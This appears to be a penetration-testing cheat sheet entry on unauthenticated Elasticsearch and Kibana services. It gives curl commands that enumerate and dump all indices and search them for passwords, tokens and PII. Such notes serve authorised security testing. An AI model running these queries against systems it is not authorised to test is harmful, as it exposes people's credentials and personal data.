Elasticsearch / Kibana
What it is: Distributed search and analytics engine. Stores data in JSON indices. Frequently exposed without authentication, leaking credentials, PII, and application data. Kibana is its visualization frontend.
Default ports: 9200 (Elasticsearch), 5601 (Kibana)
Vuln research:
Check Elasticsearch (port 9200)
Unauthenticated by default — Dump all indices
curl -s http://$IP:9200/
curl -s http://$IP:9200/_cat/indices?v
curl -s http://$IP:9200/_search?pretty
Example Output
{
"name" : "node-1",
"cluster_name" : "elasticsearch",
"version" : { "number" : "7.17.0" }
}
Indices may contain credentials, PII, logs
Dump specific index
Search for sensitive data — Credentials, tokens, PII
curl -s "http://$IP:9200/<index>/_search?pretty&size=100"
curl -s "http://$IP:9200/_all/_search?q=password&pretty"
Kibana (port 5601)
Dashboard may expose sensitive data — Check for open access
curl -s http://$IP:5601/api/status
# If accessible, browse dashboards for credentials/data